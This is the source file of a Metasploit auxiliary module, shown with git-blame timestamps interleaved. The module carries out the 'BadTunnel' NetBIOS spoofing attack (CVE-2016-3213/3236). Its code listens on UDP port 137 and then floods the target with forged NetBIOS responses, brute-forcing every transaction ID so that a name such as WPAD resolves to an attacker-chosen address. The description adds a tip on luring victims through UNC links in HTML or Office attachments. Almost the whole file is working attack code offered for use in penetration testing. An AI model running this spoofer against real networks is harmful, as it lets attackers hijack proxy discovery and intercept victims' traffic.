2016-06-17 08:06:04 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
2016-06-20 01:50:12 +00:00
|
|
|
'Name' => 'NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)',
|
2016-06-17 08:06:04 +00:00
|
|
|
'Description' => %q{
|
2016-06-18 19:34:49 +00:00
|
|
|
This module listens for a NetBIOS name request and then continuously spams
|
2016-06-18 20:37:54 +00:00
|
|
|
NetBIOS responses to a target for given hostname, causing the target to cache
|
|
|
|
a malicious address for this name. On high-speed networks, the PPSRATE value
|
|
|
|
should be increased to speed up this attack. As an example, a value of around
|
|
|
|
30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup.
|
|
|
|
Distant targets may require more time and lower rates for a successful attack.
|
|
|
|
|
|
|
|
This module works when the target is behind a NAT gateway, since the stream of
|
|
|
|
NetBIOS responses will keep the NAT mapping alive after the initial setup. To
|
|
|
|
trigger the initial NetBIOS request to the Metasploit system, force the target
|
|
|
|
to access a UNC link pointing to the same address (HTML, Office attachment, etc).
|
2016-06-20 01:50:12 +00:00
|
|
|
|
|
|
|
This NAT-piercing issue was named the 'BadTunnel' vulnerability by the discoverer,
|
|
|
|
Yu Yang (@tombkeeper). The Microsoft patches (MS16-063/MS16-077) impact the way
|
|
|
|
that the proxy host (WPAD) host is identified, but do change the predictability
|
|
|
|
of NetBIOS requests.
|
|
|
|
|
2016-06-17 08:06:04 +00:00
|
|
|
},
|
2016-06-28 20:21:19 +00:00
|
|
|
'Author' => [
|
2016-06-19 18:36:39 +00:00
|
|
|
'vvalien', # Metasploit Module (post)
|
2016-06-19 23:44:32 +00:00
|
|
|
'hdm', # Metasploit Module
|
2016-06-20 01:50:12 +00:00
|
|
|
'tombkeeper' # Vulnerability Discovery
|
2016-06-18 06:23:49 +00:00
|
|
|
],
|
2016-06-17 08:06:04 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
[ 'Service' ]
|
|
|
|
],
|
|
|
|
'PassiveActions' =>
|
|
|
|
[
|
|
|
|
'Service'
|
|
|
|
],
|
2016-06-18 20:37:54 +00:00
|
|
|
'DefaultAction' => 'Service',
|
2016-06-20 01:50:12 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/'],
|
|
|
|
['CVE', '2016-3213'],
|
|
|
|
['MSB', 'MS16-063'],
|
|
|
|
['CVE', '2016-3236'],
|
|
|
|
['MSB', 'MS16-077']
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 14 2016'
|
2016-06-17 08:06:04 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
|
|
|
|
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 137 ]),
|
2016-06-18 20:37:54 +00:00
|
|
|
OptString.new('NBNAME', [ true, "The NetBIOS name to spoof a reply for", 'WPAD' ]),
|
|
|
|
OptAddress.new('NBADDR', [ true, "The address that the NetBIOS name should resolve to", Rex::Socket.source_address("50.50.50.50") ]),
|
|
|
|
OptInt.new('PPSRATE', [ true, "The rate at which to send NetBIOS replies", 1_000])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2016-06-17 08:06:04 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def netbios_service
|
|
|
|
@port = datastore['SRVPORT'].to_i
|
|
|
|
|
|
|
|
# MacOS X workaround
|
|
|
|
::Socket.do_not_reverse_lookup = true
|
|
|
|
|
|
|
|
@sock = ::UDPSocket.new()
|
|
|
|
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
|
|
|
|
@sock.bind(datastore['SRVHOST'], @port)
|
|
|
|
|
2016-06-18 20:37:54 +00:00
|
|
|
@targ_rate = datastore['PPSRATE']
|
|
|
|
@fake_name = datastore['NBNAME']
|
|
|
|
@fake_addr = datastore['NBADDR']
|
2016-06-17 08:06:04 +00:00
|
|
|
|
2016-06-19 18:36:39 +00:00
|
|
|
print_status("Listening for NetBIOS requests...")
|
2016-06-17 08:06:04 +00:00
|
|
|
|
|
|
|
begin
|
|
|
|
loop do
|
|
|
|
packet, addr = @sock.recvfrom(65535)
|
|
|
|
next if packet.length == 0
|
|
|
|
|
|
|
|
@targ_addr = addr[3]
|
|
|
|
@targ_port = addr[1]
|
|
|
|
break
|
|
|
|
end
|
|
|
|
|
2016-06-19 18:36:39 +00:00
|
|
|
# TODO: Seed our counter based on the TXID of this request
|
|
|
|
print_status("Received a NetBIOS request from #{@targ_addr}:#{@targ_port}")
|
2016-06-17 08:06:04 +00:00
|
|
|
@sock.connect(@targ_addr, @targ_port)
|
2016-06-18 20:37:54 +00:00
|
|
|
|
2016-06-17 08:06:04 +00:00
|
|
|
netbios_spam
|
|
|
|
|
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
|
|
|
rescue ::Exception => e
|
2016-06-19 18:36:39 +00:00
|
|
|
print_error("Error #{e.class} #{e} #{e.backtrace}")
|
2016-06-17 08:06:04 +00:00
|
|
|
ensure
|
2016-06-19 18:36:39 +00:00
|
|
|
@sock.close if @sock
|
2016-06-17 08:06:04 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def netbios_spam
|
2016-06-18 20:37:54 +00:00
|
|
|
payload =
|
2016-06-19 18:36:39 +00:00
|
|
|
"\xff\xff" + # TX ID (will brute force this)
|
|
|
|
"\x85\x00" + # Flags = response + authoratative + recursion desired
|
|
|
|
"\x00\x00" + # Questions = 0
|
|
|
|
"\x00\x01" + # Answer RRs = 1
|
|
|
|
"\x00\x00" + # Authority RRs = 0
|
|
|
|
"\x00\x00" + # Additional RRs = 0
|
|
|
|
"\x20" +
|
|
|
|
Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
|
|
|
|
"\x00" +
|
2016-06-19 23:44:32 +00:00
|
|
|
"\x00\x20" + # Type = NB
|
2016-06-19 18:36:39 +00:00
|
|
|
"\x00\x01" + # Class = IN
|
|
|
|
"\x00\x04\x93\xe0" + # TTL long time
|
|
|
|
"\x00\x06" + # Datalength = 6
|
|
|
|
"\x00\x00" + # Flags B-node, unique
|
|
|
|
Rex::Socket.addr_aton(@fake_addr)
|
2016-06-17 08:06:04 +00:00
|
|
|
|
|
|
|
stime = Time.now.to_f
|
|
|
|
pcnt = 0
|
|
|
|
pps = 0
|
|
|
|
|
2016-06-19 18:36:39 +00:00
|
|
|
print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
|
2016-06-17 08:06:04 +00:00
|
|
|
|
|
|
|
live = true
|
|
|
|
while live
|
|
|
|
0.upto(65535) do |txid|
|
|
|
|
begin
|
|
|
|
payload[0,2] = [txid].pack("n")
|
|
|
|
@sock.write(payload)
|
|
|
|
pcnt += 1
|
|
|
|
|
|
|
|
pps = (pcnt / (Time.now.to_f - stime)).to_i
|
|
|
|
if pps > @targ_rate
|
|
|
|
sleep(0.01)
|
|
|
|
end
|
|
|
|
rescue Errno::ECONNREFUSED
|
2016-06-19 18:36:39 +00:00
|
|
|
print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
|
2016-06-17 08:06:04 +00:00
|
|
|
live = false
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2016-06-19 18:36:39 +00:00
|
|
|
loop { netbios_service }
|
2016-06-17 08:06:04 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|